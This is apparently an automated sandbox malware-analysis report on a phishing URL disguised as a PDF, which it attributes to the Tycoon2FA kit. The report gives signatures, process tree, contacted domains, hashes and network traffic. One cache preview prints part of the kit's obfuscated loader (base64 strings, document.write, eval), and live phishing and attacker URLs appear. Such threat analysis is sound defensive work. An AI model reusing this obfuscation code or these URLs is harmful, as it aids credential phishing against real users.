Edit tour

Windows Analysis Report
https://sallybarmescounsellor.co.uk/pad4.pdf

Overview

General Information

Sample URL:	https://sallybarmescounsellor.co.uk/pad4.pdf
Analysis ID:	1647597
Infos:

Detection

Invisible JS, Tycoon2FA

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected AntiDebug via timestamp check

Yara detected Invisible JS

Yara detected Obfuscation Via HangulCharacter

Yara detected Tycoon 2FA PaaS

AI detected suspicious Javascript

Creates files inside the system directory

Deletes files inside the Windows folder

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2424,i,5229905219109430079,10851050355484582546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2480 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.5.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.0.d.script.csv	JoeSecurity_Tycoon2FA_1	Yara detected Tycoon 2FA PaaS	Joe Security
0.0.d.script.csv	JoeSecurity_AntiDebugBrowser	Yara detected AntiDebug via timestamp check	Joe Security
0.1.d.script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.4..script.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.d.script.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.0.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.1.pages.csv	JoeSecurity_HangulCharacter	Yara detected Obfuscation Via HangulCharacter	Joe Security
0.0.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
0.1.pages.csv	JoeSecurity_InvisibleJS	Yara detected Invisible JS	Joe Security
Click to see the 5 entries

HTTP traffic detected: POST /report/v4?s=7jsrRBHL7OOBKpq8LmN6XPHEZF3E%2BfRrsq%2B22P1okQFQDB%2Fxc2VPCdkwWwV3SJ5NhVy5SzVS8bVnLzAHX0jAk1mjkoOueiYg3Vv6vBiQpLbqjHP4bfdnrS%2B28igD HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 432Content-Type: application/reports+jsonOrigin: https://uz5k.vsmaemhjvk.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 01:09:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jsrRBHL7OOBKpq8LmN6XPHEZF3E%2BfRrsq%2B22P1okQFQDB%2Fxc2VPCdkwWwV3SJ5NhVy5SzVS8bVnLzAHX0jAk1mjkoOueiYg3Vv6vBiQpLbqjHP4bfdnrS%2B28igD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=16286&min_rtt=16286&rtt_var=6107&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2233&delivery_rate=248311&cwnd=247&unsent_bytes=0&cid=e5f5288a47490870&ts=36&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925a85ea69b9b2c0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96913&min_rtt=96359&rtt_var=20866&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1901&delivery_rate=38638&cwnd=239&unsent_bytes=0&cid=66a3ceafd25be2f0&ts=332&x=0"

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir3036_1361797875

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir3036_1361797875

Jump to behavior

Source: classification engine

Classification label: mal84.phis.evad.win@22/6@10/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2424,i,5229905219109430079,10851050355484582546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2480 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2424,i,5229905219109430079,10851050355484582546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2480 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match

File source: 0.0.d.script.csv, type: HTML

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://sallybarmescounsellor.co.uk/pad4.pdf	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label	Link
https://uz5k.vsmaemhjvk.ru/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	high
sallybarmescounsellor.co.uk	185.199.220.71	true	false	high
code.jquery.com	151.101.194.137	true	false	high
www.google.com	142.250.81.228	true	false	high
uz5k.vsmaemhjvk.ru	104.21.112.1	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://uz5k.vsmaemhjvk.ru/vHFigT/	true		unknown
https://uz5k.vsmaemhjvk.ru/favicon.ico	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://sallybarmescounsellor.co.uk/pad4.pdf	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.199.220.71	sallybarmescounsellor.co.uk	United Kingdom	12488	KRYSTALGR	false
142.250.81.228	www.google.com	United States	15169	GOOGLEUS	false
104.21.112.1	uz5k.vsmaemhjvk.ru	United States	13335	CLOUDFLARENETUS	true
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647597
Start date and time:	2025-03-25 02:08:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://sallybarmescounsellor.co.uk/pad4.pdf
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.evad.win@22/6@10/6

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, sppsvc.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.80.78, 142.250.80.67, 142.250.80.110, 142.251.16.84, 142.251.35.174, 142.250.81.238, 142.251.32.110, 142.250.80.46, 142.250.80.74, 142.251.40.170, 142.251.32.106, 142.250.81.234, 142.250.80.106, 142.250.65.202, 142.250.65.234, 142.250.65.170, 142.250.176.202, 142.251.40.202, 142.251.40.138, 142.251.40.234, 172.217.165.138, 142.251.40.106, 142.251.35.170, 142.251.41.10, 23.52.159.218, 142.250.65.238, 142.250.176.206, 142.250.65.206, 142.250.65.174, 142.251.40.131, 142.250.80.99, 142.251.40.206, 23.205.30.245, 20.109.210.53
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://sallybarmescounsellor.co.uk/pad4.pdf

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.5
Encrypted:	false
SSDEEP:	3:H+rYn:D
MD5:	F1C9C44E663E7E62582E3F5B236C1C72
SHA1:	E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
SHA-256:	D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
SHA-512:	19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCRFkk2auY0aYEgUNNzCpMCFrRKeonvwSmA==?alt=proto
Preview:	CgkKBw03MKkwGgA=

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65360)
Category:	downloaded
Size (bytes):	911123
Entropy (8bit):	2.2902728978451674
Encrypted:	false
SSDEEP:	768:UirdFTv4ylhN1irdFTv4ylhNVLkK9GNdLkK9GNr:XrbTgcNQrbTgcNVLBINdLBINr
MD5:	F3A4A3F88F925F7E6D6F2F6A392B05FC
SHA1:	C5A4ED4F4F9C59CC5C8497BCDA031AEBF6FEAEB9
SHA-256:	8BC9425AA8C8F875515B62554D0DAD5E42DD2D2828523D72CB8333673A3C15F4
SHA-512:	130FD946AE139E1F1B9C8D00E90BB2296C8EFFF28BF169697A79F33A6CD75087D877A78F97851575EF2C8F101DD6516F49DBB70E70611FF6D9E58E18F70EF7F2
Malicious:	false
Reputation:	low
URL:	https://uz5k.vsmaemhjvk.ru/vHFigT/
Preview:	<script>.RzFtFhBLce = atob("aHR0cHM6Ly91WjVrLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");.TOcENSKbBW = atob("bm9tYXRjaA==");.bSFKISugFc = atob("d3JpdGU=");.if(RzFtFhBLce == TOcENSKbBW){.document[bSFKISugFc](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBwVXZ0T0FuRFJXID0gewogIGdldChvUkNEaUl5UUtjLCB6bHdVRUpqQ1ltKSB7CiAgICBjb25zdCBwZHNsanpJQ2VRID0gWy4uLnpsd1VFSmpDWW1dCiAgICAgIC5tYXAoRFZjbGdGRGRzQSA9PiArKCfvvqAnID4gRFZjbGdGRGRzQSkpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IFlYb1JmZWFTVWogPSBwZHNsanpJQ2VRLnJlcGxhY2UoLy57OH0vZywgRWxmRmRwSURMcCA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KEVsZkZkcElETHAsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKFlYb1JmZWFTVWopOwo

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Total Packets: 312
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 02:09:19.676105976 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:20.020148039 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:20.680953026 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:21.884121895 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:22.612557888 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:22.612584114 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:22.612711906 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:22.613101959 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:22.613115072 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:22.820739031 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:22.820848942 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:22.822557926 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:22.822563887 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:22.822968006 CET	443	49729	142.250.81.228	192.168.2.4
Mar 25, 2025 02:09:22.863718987 CET	49729	443	192.168.2.4	142.250.81.228
Mar 25, 2025 02:09:24.290782928 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 02:09:25.580341101 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.580450058 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.580560923 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.580945969 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.581052065 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.581137896 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.581193924 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.581228971 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.581274033 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.581300020 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.929354906 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.929516077 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:25.935619116 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:25.935822964 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.093122959 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.093199015 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.093372107 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.093460083 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.094126940 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.094490051 CET	443	49731	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.094589949 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.134768963 CET	49731	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.136332989 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.315038919 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.315116882 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.315193892 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.315709114 CET	49732	443	192.168.2.4	185.199.220.71
Mar 25, 2025 02:09:26.315747023 CET	443	49732	185.199.220.71	192.168.2.4
Mar 25, 2025 02:09:26.650995970 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.651092052 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:26.651187897 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.652487040 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.652518988 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:26.872051954 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:26.872153997 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.873913050 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.873944998 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:26.874449015 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:26.874783993 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:26.916378021 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377204895 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377621889 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377764940 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377773046 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.377793074 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377805948 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.377845049 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378010988 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378047943 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378082037 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378099918 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378118992 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378139973 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378273010 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378319979 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378357887 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378376007 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378391981 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378417969 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378818989 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.378878117 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.378891945 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379035950 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379077911 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379110098 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379111052 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.379121065 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379169941 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.379681110 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379750013 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.379761934 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379843950 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.379923105 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.379934072 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.380016088 CET	443	49733	104.21.112.1	192.168.2.4
Mar 25, 2025 02:09:27.380072117 CET	49733	443	192.168.2.4	104.21.112.1
Mar 25, 2025 02:09:27.380084038 CET	443	49733	104.21.112.1	192.168.2.4
